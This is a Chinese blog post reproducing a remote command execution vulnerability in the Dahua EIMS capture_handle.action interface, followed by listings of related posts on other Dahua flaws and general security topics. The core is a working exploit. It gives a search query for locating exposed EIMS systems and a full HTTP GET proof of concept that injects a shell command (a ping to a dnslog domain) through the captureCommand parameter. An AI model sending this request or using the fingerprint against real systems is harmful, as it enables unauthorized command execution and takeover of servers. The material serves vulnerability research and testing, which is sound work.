大华 EIMS-capture_handle.action接口存在远程命令执行漏洞

已于 2024-03-11 21:41:14 修改
阅读量1.2k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-11 21:41:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136636198
本文介绍了大华EIMS系统中capture_handle.action接口存在的远程命令执行漏洞,详细阐述了漏洞描述,包括攻击者如何利用此漏洞获取服务器控制权限。并提供了测绘语法和漏洞复现步骤,如POC示例及请求dnslog的验证方法。

漏洞描述

大华 EIMS-capture_handle.action接口存在远程命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。

测绘语法

title=”EIMS”

POC

GET /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20xxx.dnslog.cn%20index.pcap HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko

漏洞复现

请求dnslog
 


刷新dnslog

漏洞复现】大华智慧园区综合管理平台ipms命令执行漏洞
晚风不及你
03-16 866
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华智能物联综合管理平台 任意文件读取漏洞复现(QVD-2023-45063)
0xSec
02-01 1502
大华ICC智能物联综合管理平台readpic接口存在任意文件读取漏洞,未经身份验证的攻击者 可以获取系统内部敏感文件信息,使系统处于极不安全的状态。
大华EIMS-capture_handle接口远程命令执行漏洞
qq_36334672的博客
03-14 869
大华EIMS CAPTURE_HANDLE接口允许远程命令执行
漏洞复现】大华智慧园区综合管理平台任意密码读取
2201_75756681的博客
01-05 921
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
漏洞复现|大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞合集
weixin_44217321的博客
02-27 4797
大华智慧园区综合管理平台客户端由于前台缺少访问控制授权措施,可以从ip/WPMS进行定位,借助Payload进行漏洞触发,从而达到获取服务器数据的影响。大华园区综合管理平台/emap/webservice/gis/soap/bitmap接口存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
大华DSS user_toLoginPage.action命令执行漏洞
Keepb1ue的博客
07-07 1135
大华DSS 数字监控系统是大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。大华存在前台命令执行漏洞,攻击者可以通过此漏洞获取服务器权限。
eims_5.3_free.rar_4 3 2 1_EIMS_eims 5.3_手机优化
09-23
EIMS企业信息管理系统 5.3 版本更新说明:2012-04-25 1、优化重构了用户表与页面; 2、优化了数据库结构 3、优化了文章列表,提高了运行速度; 4、增加了系统设置; 5、修正了系统开关与时间错误; 6、修正了...
asp源码-EIMS抽奖系统eims-lot v1.1.zip
02-08
asp源码—EIMS抽奖系统eims_lot v1.1.zip asp源码—EIMS抽奖系统eims_lot v1.1.zip asp源码—EIMS抽奖系统eims_lot v1.1.zip asp源码—EIMS抽奖系统eims_lot v1.1.zip asp源码—EIMS抽奖系统eims_lot v1.1.zip asp...
【学习笔记】《孙子兵法》与网络安全
tpriwwq的专栏
11-07 1042
战争的核心在于人与人的对抗,而网络安全的核心也是在于人与人的对抗,因此《孙子兵法》中的相关理论和内容,对于网络安全同样具有重要的指导意义。
CyberSecEval 2
m0_73579990的博客
11-05 611
数据集在 Hugging Face 上可访问:数据集简介该数据集名为,是一个广泛的网络安全评估数据集,专门用于对大语言模型(LLM)进行网络安全能力的评估。。根据页面上的数据,Python:351 条记录PHP:162 条记录JavaScript:249 条记录Rust:204 条记录Java:229 条记录C++:259 条记录C:227 条记录C#:235 条记录这些数据记录主要包含关于不同编程语言中的潜在安全漏洞、修复措施和与之相关的代码片段。
详解网络安全免杀对抗:攻防的猫鼠游戏
2501_91408459的博客
11-02 1074
摘要: 网络安全中的免杀对抗是一场持续演变的攻防博弈。防御方依赖特征码检测(静态字节、字符串、API调用和行为特征),而攻击方采用代码混淆、字符串加密、动态API调用、无文件化攻击等6类主要免杀技术。其中"命令提示符制作木马"本质是利用系统工具的白利用技术,虽具隐蔽性但已受到行为监控限制。现代安全防护需结合静态检测、行为分析、AI和零信任架构等多层防御机制。随着双方技术不断升级,免杀对抗呈现动态平衡态势,凸显网络安全防护体系的复杂性。(149字)
水坑攻击的攻击原理和特点+案例和防御方法
xixixi7777的博客
11-04 1253
一旦目标设备被植入后门或恶意软件,攻击者就可以以此为跳板,在其所属的内部网络中横向移动,窃取敏感数据或进行更深层次的破坏。:这是一起著名的APT攻击,攻击者入侵了几家全球性公司的对外Web服务器,作为水坑,来攻击访问这些公司网站的客户和其他企业。它的名字源于一个生动的自然比喻:在草原上,攻击者无需追逐特定的猎物(目标),只需在它。:攻击者入侵了一家知名能源公司员工经常访问的某行业政策网站,植入了恶意代码,最终成功渗透了多家能源公司的内部网络。(常访问的网站)里下毒,就可以静静地等待它自投罗网。
web安全开发,在线%服务器日志入侵检测%系统安全开发,基于Python,flaskWeb,正则表达式检测,mysql数据库
Strategic__的博客
11-08 372
帮助客户做服务器日志入侵检测系统Demo时,咱们用Python+Flask搭了Web框架,MySQL存日志和检测结果。核心靠正则表达式匹配攻击特征,比如SQL注入、异常IP访问这些。刚开始写正则总漏规则,后来对着常见攻击样本反复调,总算能抓到八成以上异常。界面做了实时检测面板,日志条目标红显示风险点。虽然只是基础版,但把日志采集,规则匹配,结果展示串起来了,实际测的时候抓着几条模拟攻击记录,还挺有成就感的。
华为防火墙基础功能详解:构建网络安全的基石
最新发布
Fanmeang的博客
11-08 553
本文深入解析华为防火墙的三大核心功能:安全域、会话表和安全策略。安全域作为逻辑边界,基于网络区域划分实施访问控制,遵循"默认拒绝"原则;会话表通过状态检测机制,仅验证首包并记录连接状态,极大提升转发效率;安全策略则基于五元组定义精确的流量放行规则。三者协同工作形成严密的防御体系:安全域确定流量路径,安全策略进行访问裁决,会话表实现高效转发。理解这一基础框架是掌握华为防火墙高级功能的前提。
A模块 系统与网络安全 第四门课 弹性交换网络-5
weixin_40041436的博客
11-07 736
本文介绍了浮动路由和VRRP技术的基本原理与配置方法。浮动路由通过配置备份路径提供冗余,当主路径故障时自动切换。VRRP则通过虚拟路由器实现网关备份,包括主备选举、优先级设置、状态切换等机制,能够有效解决单点故障问题。文中详细说明了VRRP的组播通信、定时器设置、抢占模式等关键技术点,并提供了具体的配置命令示例。两种技术均可提升网络可靠性,VRRP特别适用于保障网关设备的高可用性。
AI安全与网络安全的融合:从挑战到解决方案
weixin_43172311的博客
11-07 1031
企业需要认识到:智能安全不是一次性项目,而是持续优化的过程。随着技术的进步和应用场景的丰富,相关的安全措施也需要不断调整和完善。
网络安全培训
qq_66652044的博客
11-05 685
网络安全培训重点知识总结​一、网络安全概述与背景知识​二、漏洞扫描工具​三、安全基线核查​四、安全加固措施​五、安全事件应急响应​六、安全检查流程​七、总结与提升
现代汽车确认遭遇数据泄露, 攻击者连续窃密9天获取用户驾照信息
FreeBuf_的博客
11-07 372
现代汽车美国软件子公司(Hyundai AutoEver America, LLC)已正式确认,公司因协同网络攻击导致客户敏感信息泄露。
共筑网络安全,守护绿色家园
2501_93436887的博客
11-07 1134
《网络安全守护者:JoySSL专业版证书为数据传输加密护航》摘要:在数字化时代,数据安全面临严峻挑战。JoySSL专业版证书通过高强度加密技术,为网络传输打造安全屏障,有效防范数据窃取和篡改风险。该证书采用先进加密算法,实现数据传输全程保护,兼容各类平台快速部署。企业使用后不仅能规避安全风险,还能通过"小绿锁"标识增强用户信任。作为网络安全的重要防线,JoySSL助力企业共筑安全生态,守护数字时代的绿色网络家园。(149字)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值